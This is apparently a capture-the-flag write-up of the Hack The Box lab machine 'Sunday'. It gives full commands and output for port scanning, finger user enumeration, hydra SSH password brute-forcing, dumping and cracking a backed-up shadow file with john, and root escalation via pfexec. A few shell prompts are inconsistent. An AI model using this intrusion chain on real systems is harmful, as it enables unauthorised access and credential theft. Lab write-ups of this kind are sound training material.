Details
This machine is Sunday from Hack The Box
Recon
I started a nmap scan but it was taking far too long so I setup a masscan
root@kali:~# masscan -p0-65335,U:0-65335 --rate=1000 -i tun0 10.10.10.76
Discovered open port 35642/tcp on 10.10.10.76
Discovered open port 54116/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76 Then I nmaped the open ports only
root@kali:~# nmap -sV -p35642,54116,22022,111,79 -T4 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 12:00 EDT
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 12:01 (0:00:15 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
35642/tcp open smserverd 1 (RPC #100155)
54116/tcp open unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.00 secondsUser
I used finger enum from https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl
root@kali:~# ./finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344392
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sat Jul 13 12:16:27 2019 #########
sammy@10.10.10.76: sammy pts/2 <Apr 24, 2018> 10.10.14.4
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4I had 2 potential usernames, so I saved them as users.txt and pointed hydra at the ssh
root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 10.10.10.76 ssh
[SNIP]
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
[SNIP]Tried to login with the creds
root@kali:~# ssh sunny@10.10.10.76 -p 22022
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1Weird, so I specified a valid key exchange
root@kali:~# ssh sunny@10.10.10.76 -p 22022 -o KeXAlgorithms=diffie-hellman-group1-sha1
sunny@sunday:~$ There we go
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/trollI tested it
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)It seemed to actually be a troll, so I carried on my enum, eventually finding /backup
sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::I saved sammys hash as crack.txt and set john on it
root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
1g 0:00:00:27 DONE (2019-07-13 13:36) 0.03591g/s 7356p/s 7356c/s 7356C/s domonique1..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completedI then su'd
sunny@sunday:/backup$ su sammy
sunny@sunday:/backup$ User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wgetI can run wget as root, so I could use this to write as root and grant myself extra privs, but as it's a solaris machine, I checked the profiles too
sunny@sunday:/backup$ profiles -l
Primary Administrator:
* uid=0, gid=0
Basic Solaris User:
/usr/bin/cdda2wav.bin
privs=file_dac_read,sys_devices,proc_priocntl,net_privaddr
/usr/bin/cdrecord.bin
privs=file_dac_read,sys_devices,proc_lock_memory,proc_priocntl,net_privaddr
/usr/bin/readcd.bin privs=file_dac_read,sys_devices,net_privaddr
/usr/lib/fs/smbfs/mount privs=sys_mount
/usr/lib/fs/smbfs/umount privs=sys_mount
All:
* This means I can run pfexec as root
sunny@sunday:/backup$ pfexec bash
sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)Then find my flags
sunny@sunday:~# find / -name user.txt 2>/dev/null
/export/home/sammy/Desktop/user.txt
sunny@sunday:~# cat /export/home/sammy/Desktop/user.txt
[REDACTED]sunny@sunday:~# cd /root
sunny@sunday:/root# ls -la
drwx------ 6 root root 13 2018-04-24 10:31 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-rw-r--r-- 1 root root 280 2009-05-14 21:18 .bashrc
drwx------ 3 root root 3 2018-04-15 20:22 .config
drwx------ 3 root root 3 2018-04-24 09:30 .gconf
drwx------ 2 root root 3 2018-04-15 20:23 .gconfd
-rwx------ 1 root root 112 2018-04-24 10:48 overwrite
-rw-r--r-- 1 root root 611 2009-05-14 21:18 .profile
-rw------- 1 root root 1365 2018-04-15 20:23 .recently-used.xbel
-r-------- 1 root root 33 2018-04-15 20:38 root.txt
drwx------ 3 root root 3 2018-04-15 20:30 .sunw
-r-x--x--x 1 root root 53 2019-07-13 17:42 troll
-rw------- 1 root root 53 2018-04-24 10:35 troll.original
sunny@sunday:/root# cat root.txt
[REDACTED]